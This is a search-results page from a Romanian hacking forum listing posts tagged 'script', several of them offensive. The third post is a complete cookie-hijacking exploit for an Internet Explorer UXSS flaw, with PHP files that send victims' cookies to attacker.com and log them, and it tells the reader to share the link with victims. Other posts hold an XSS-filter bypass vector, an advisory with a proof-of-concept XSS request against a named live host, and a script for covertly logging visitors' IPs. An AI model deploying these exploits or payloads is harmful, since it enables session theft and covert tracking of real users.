Jump to content

Search the Community

Showing results for tags 'script'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this: <script>x = "MY INJECTION"</script> As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector. Like so: </script><script>alert(1)+" You could of course use a standard ",alert(1)," but what if quotes are filtered? I then came up with the idea of using SVG and an HTML escaped quote. This bypasses the filter and is a HTML XSS vector that doesn’t have a DOM vulnerability so it’s within scope of the filter and is very common in my experience. Here is the final vector: <script> x = "</script><svg><script>alert(1)+""; XSS auditor PoC: HERE Source
  2. Salutare Gasesc pe undeva script asta : PHP Scripts - PHP-Javascript Shoutcast and Icecast | CodeCanyon undeva pe gratis? multumesc frumos
  3. Cookie hijacking: Internet Explorer UXSS (CVE-2015-0072) Host below files on webserver (attacker.com) and share the exploit link with victims, exploit.php --- exploit link (Share with victim) redirect.php --- Script to redirect on target page (target page should not contain X-Frame-Options or it will fail) delay.php --- Script to add delay collector.php --- Script to collect hijacked cookie log.txt --- Collected cookies will be stored in this text file -------------------------------------exploit.php----------------------------------- <iframe src="redirect.php" style="display:none"></iframe> <iframe src="https://target.com/" style="display:none"></iframe> <script> top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","http://attacker.com/delay.php",false),send();_.location="javascript:bkp=\'http://attacker.com/collector.php?\'+document.cookie;alert(bkp);window.location(bkp);"'); </script> -------------------------------------------------------------------------------------- -------------------------------------redirect.php----------------------------------- <?php header("Location: https://target.com/"); exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------delay.php----------------------------------- <?php sleep(15); echo 'Bhdresh'; exit(); ?> -------------------------------------------------------------------------------------- -------------------------------------collector.php----------------------------------- <?php $f = fopen("log.txt", 'a'); fwrite($f, $_SERVER["REQUEST_URI"]."\n"); fclose($f); header("Location: http://www.youtube.com/"); ?> -------------------------------------------------------------------------------------- -------------------------------------log.txt----------------------------------- - Create a file as log.txt and modify the permissions (chmod 777 log.txt) -------------------------------------------------------------------------------------- Demo: facabook.net16.net/exploit.php Reference: http://innerht.ml/blog/ie-uxss.html Source
  4. Mult a?teptatul script este gata de lansare! Sunte?i gata s? v? schimba?i via?a?? Din acest moment, nu ve?i mai vedea ?tiri/programe/etc de c?cat postate pe forum! Chrome Extension (standalone): Anti Aerosol.crx — RGhost — file sharing Daca cineva poate uploada extensia pe webstore este rugat sa o faca Tampermonkey Script Download: [JavaScript] Anti Aerosol - Pastebin.com Tampermonkey Download: https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en Probabil func?ioneaz? ?i pe Firefox cu Greasemonkey! Am testat doar pe chrome! Screenshots: Testimoniale:
  5. Document Title: =============== Webinars v2.2.26.0 - Client Side Cross Site Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1412 Release Date: ============= 2015-01-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1412 Common Vulnerability Scoring System: ==================================== 2.4 Product & Service Introduction: =============================== http://www.webinars.com Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the Webinars v2.2.26.0 conference web-application. Vulnerability Disclosure Timeline: ================================== 2015-01-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official InterCall Webinar v2.2.26.0 conference web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin session data by client-side cross site requests. The vulnerability is located in the `meeting_id` value of the `viewer.php` file. Remote attackers are able to inject malicious script codes to client-side web-application requests. Remote attackers uses a validation error in the viewer.php file to execute client-side script code in the webinar web-application context. The client-side script code execution occurs in the same file after a site refresh. The attack vector is located on the client-side of the service and the request method to inject the script code is `GET`. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.4. Exploitation of the client-side remote vulnerability requires low or medium user interaction and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and client-side manipulation of affected and connected module web context. Vulnerable Service(s): [+] Webinars Vulnerable File(s): [+] viewer.php Vulnerable Parameter(s): [+] meeting_id Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged applicaiton user account and low or medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. --- PoC Session Logs [GET] --- GET /viewer.php?meeting_id=%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E HTTP/1.1 Host: webinars.snm.org - User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive - HTTP/1.1 200 OK Date: Fri, 16 Jan 2015 18:10:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Content-Length: 3044 Connection: close Content-Type: text/html; charset=UTF-8 PoC: Webinar <body > <div id='message_box' class='message' style='visibility:hidden'> <div class='box_header'><a onclick="ShowMessage(false, ''); return false;" href='javascript:void(0)'> [ X ]</a></div> <p id='message_text'> </p> </div> <div id='page_box' class='page' style='visibility:hidden'> <div class='box_header'><a onclick="ShowPageBox(false); return false;" href='javascript:void(0)'> [ X ]</a></div> <iframe id='page_content' src=''></iframe> </div> <div id='sharing_box' class='page' style='visibility:hidden'> <div class='box_header'><a onclick="ShowSharingBox(false); return false;" href='javascript:void(0)'> [ X ]</a></div> <iframe id='sharing_content' src=''></iframe>[CLIENT-SIDE SCRIPT CODE EXECUTION!] </div> <div id="flashcontent"> <object id="viewer" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="100%" height="100%"> <param name="flashvars" value="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" /> <param name="movie" value="viewer.swf?1719627766" /> <param name="swliveconnect" value="true" /> <param name="wmode" value="opaque" /> <param name="allowScriptAccess" value="always" /> <param name="allowFullScreen" value="true" /> <object data="viewer.swf?1719627766" flashvars="MeetingServer=http://meetingengine.glcollaboration.com/wc2_22260/api.php&MeetingID=">'><SCRIPT>alert('samir')</SCRIPT>&HasFSCommand=1&UrlTarget=_self&2142738052" width="100%" height="100%" swliveconnect=true name="viewer" wmode="opaque" allowFullScreen="true" allowScriptAccess="always" type="application/x-shockwave-flash"> <div class="noflash"> <p>You need the latest version of the Adobe Flash Player.<p/> <p><a target=_blank href="https://www.adobe.com/go/getflashplayer"><img src="https://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p> </div> </object> </object> </div> </body> Reference(s): http://localhost:80/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://www.xxx.com/meet/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://webinar.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> http://webinars.xxx.com/viewer.php?meeting_id=">'><SCRIPT>alert('samir')</SCRIPT> Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable `meeting_id` value in the viewer.php file. Restrict the input and disallow special chars and parse the output to prevent an execution of client-side injected script codes. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the webinar conference application is estimated as medium. (CVSS 2.4) Credits & Authors: ================== Hadji Samir s-dz@hotmail.fr Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Source : Webinars 2.2.26.0 Script Insertion ? Packet Storm
  6. Buna ziua, Am de rezolvat 3 probleme, daca ati putea sa ma ajutati macar la una as fi recunoscator. 1.Unix Shell script care implementeza algoritmul bancherului pentru resurse multiple . 2.Unix Shell script care implementeza algoritmul NRU . 3.Unix Shell script care implementeza algoritmul LRU. Cu stima, lmn
  7. Tineam de mai mult timp un articol pe blog-ul meu despre un script creat de mine care va ajuta sa cautati si sa downloadati fisiere de pe Girlshare.ro via Hotfiles.ro. Va trebui sa mai creeati un fisier in directorul in care se afla scriptul numit hotfiles.txt cu drepturi de scriere. Sper sa va fie de folos. <?php function get_data($url,$ref="") { if(function_exists("curl_init")){ $ch = curl_init(); $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; "."Windows NT 5.0)"; $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, $user_agent); curl_setopt( $ch, CURLOPT_HTTPGET, 1 ); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION , 1 ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION , 1 ); curl_setopt( $ch, CURLOPT_URL, $url ); curl_setopt( $ch, CURLOPT_REFERER, $ref ); curl_setopt ($ch, CURLOPT_COOKIEJAR, 'hotfiles.txt'); $html = curl_exec($ch); curl_close($ch); } else{ $hfile = fopen($url,"r"); if($hfile){ while(!feof($hfile)){ $html.=fgets($hfile,1024); } } } return $html; } function limita($text,$inceput,$sfarsit) { $rezultat=explode($inceput,$text); $rezultat=$rezultat[1]; $rezultat=explode($sfarsit,$rezultat); return $rezultat[0]; } function getTags( $dom, $tagName, $attrName, $attrValue ){ $html = ''; $domxpath = new DOMXPath($dom); $newDom = new DOMDocument; $newDom->formatOutput = true; $filtered = $domxpath->query("//$tagName" . '[@' . $attrName . "='$attrValue']"); $i = 0; while( $myItem = $filtered->item($i++) ){ $node = $newDom->importNode( $myItem, true ); // import node $newDom->appendChild($node); // append node } $html = $newDom->saveHTML(); return $html; } $melodie=$_GET["melodie"]; if(isset($melodie)) { $melodie=str_replace(' ','_',$melodie); $some_link = 'http://www.hotfiles.ro/search/'.$melodie.''; $tagName = 'span'; $attrName = 'class'; $attrValue = 'file-name'; $dom = new DOMDocument; $dom->preserveWhiteSpace = false; @$dom->loadHTMLFile($some_link); $html = getTags( $dom, $tagName, $attrName, $attrValue ); $f1=explode('mp3"',$html); $l = $f1[1]; $l1 = limita($l,'href="','"> '); $l1 = 'http://www.hotfiles.ro'.$l1.''; $n1= limita($l,'title="','"'); $follows = get_data($l1); $follow = limita($follows,'href="http://www.hotfiles.ro:8079/dmz/fisier/redirect/girlshare','"'); $final = 'http://www.hotfiles.ro:8079/dmz/fisier/redirect/girlshare'.$follow.''; $finish=get_data($final,$l1); $finish=limita($finish,'<p class="waiting"> ',' pentru'); $finish=limita($finish,'"','"'); $mp3=get_data($finish); $mp3=limita($mp3,'"POST" action="','">'); $mp3=str_replace('.mp3','[RSTForums.com].mp3',$mp3); echo '<a href="'.$mp3.'">'.$n1.'</a>'; $marime=limita($follows,'Marime</label><span>','</span>'); echo '</br>Marimea:'; echo $marime; } ?> <!DOCTYPE html> <html> <title>Hotfiles.ro mp3 downloader - caramea@RSTForums.com</title> <body> <form method="get"> Melodie: <input type="text" name="melodie"> <input type="submit" value="Cauta"> </form> <footer> <center><a href="http://rstforumsc.com">silvian0@RSTForums.com</a></center> </footer> </body> </html>
  8. Fedora 17 (Beefy Miracle) GNOME 3.4 custom wallpaper (NOT default) Screenshots (using scrot) Screenshot1 Click for large version Screenshot2 Click for large version #!/bin/bash ########################################### ### ### ### Fedora 17 i686 after install script ### ### ### ########################################### ###get administrative privileges su - root ###first system update && upgrade yum -y update yum -y upgrade ###gnome tweak yum -y install gnome-tweak-tool ###gnome shell extensions yum -y install gnome-shell-extension* ###enable rpm fusion repo yum -y localinstall --nogpgcheck http://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-stable.noarch.rpm http://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-stable.noarch.rpm yum -y update yum -y upgrade ###get gimp yum -y install gimp ###install codec yum -y install gstreamer-plugins-bad gstreamer-plugins-bad-free-extras gstreamer-plugins-bad-nonfree gstreamer-plugins-ugly gstreamer-ffmpeg libmatroska xvidcore xine-lib-extras-freeworld libdvdread libdvdnav gstreamer-plugins-good lsdvd libdvbpsi ffmpeg ffmpeg-libs gstreamer-ffmpeg ###dvd/video 32 bit rpm -ivh http://rpm.livna.org/repo/17/i386/libdvdcss-1.2.10-1.i386.rpm ###Flash Player 32 bit rpm -ivh http://linuxdownload.adobe.com/adobe-release/adobe-release-i386-1.0-1.noarch.rpm rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux yum -y install flash-plugin ###Microsoft Fonts wget http://dl.dropbox.com/u/964512/lffl_fedora/msttcore-fonts-2.0-3.noarch.rpm rpm -ivh msttcore-fonts-2.0-3.noarch.rpm ###install development tools yum -y groupinstall development-tools ###install nmap yum -y install nmap ###install vlc, scrot (screen capture tool) yum -y install vlc scrot ###The Editor yum -y install vim ###Office Suite yum -y groupinstall "Office/Productivity" ###install java plugin yum -y install icedtea-web ###install gecko-mediaplayer yum -y install gecko-mediaplayer ###install Korn Shell yum -y install ksh ###install wireshark yum -y install wireshark ###intall calibre yum -y install calibre ###Enable && start sshd systemctl enable sshd.service systemctl start sshd.service systemctl is-enabled sshd.service systemctl is-active sshd.service Some other sh*t: System Optimization ###Disable rpcbind,cups,sendmail,atd,avahi,ip6tables,livesys systemctl stop rpcbind.service systemctl disable rpcbind.service systemctl is-enabled rpcbind.service systemctl stop cups.service systemctl disable cups.service systemctl is-enabled cups.service systemctl stop sendmail.service systemctl disable sendmail.service systemctl is-enabled sendmail.service systemctl stop atd.service systemctl disable atd.service systemctl is-enabled atd.service systemctl stop avahi-daemon.service systemctl disable avahi-daemon.service systemctl is-enabled avahi-daemon.service systemctl stop ip6tables.service systemctl disable ip6tables.service systemctl is-enabled ip6tables.service systemctl stop livesys.service systemctl disable livesys.service systemctl is-enabled livesys.service systemctl stop livesys-late.service systemctl disable livesys-late.service systemctl is-enabled livesys-late.service Optional ###CERT-Forensics-Tools rpm -ivh http://www.cert.org/forensics/tools/cert-forensics-tools-release-17.rpm rpm -ivh http://www.cert.org/forensics/tools/forensics.asc yum -y install CERT-Forensics-Tools Security ###Disable all firewall default rules /sbin/iptables -F && /sbin/service iptables save ###Disable selinux su -c 'sed s/^SELINUX=.*$/SELINUX=disabled/ -i /etc/sysconfig/selinux'
  9. Acest script va trimite loguri pe mail cu fiecare vizitator.... il foloseam pe cei care voriam sa le aflu ip pe messenger....poate i v-a fi cuiva de folos... Demo : (am editat, primeam multe e-mailuri) Uploadati scriptul pe hosting...., modificati: $email = "####"; $from = "####"; index.rar - 4shared.com - online file sharing and storage - download
  10. Salut nu stiti unde as putea sa gasesc un script de genu desene-animate.info ? Nu vreau sau fac reclama sau altceva caut script-ul de multa vreme . nu am gasit nimic
  11. Multiple SEO tools script Fixed: - thumbnail generating code was wrong. Download : Multiupload.com - upload your files to multiple file hosting sites! PAROLA : rstcenter.com
  12. Salut ! Cu putin timp in urma am creat un robot yahoo . Acum vreau sa ii vand scriptul unei persoane care are nevoie . Nu spun un pret anume , cine e interesat sa imi dea mesaj . Demo : robotinformatii@yahoo.com
×
×
  • Create New...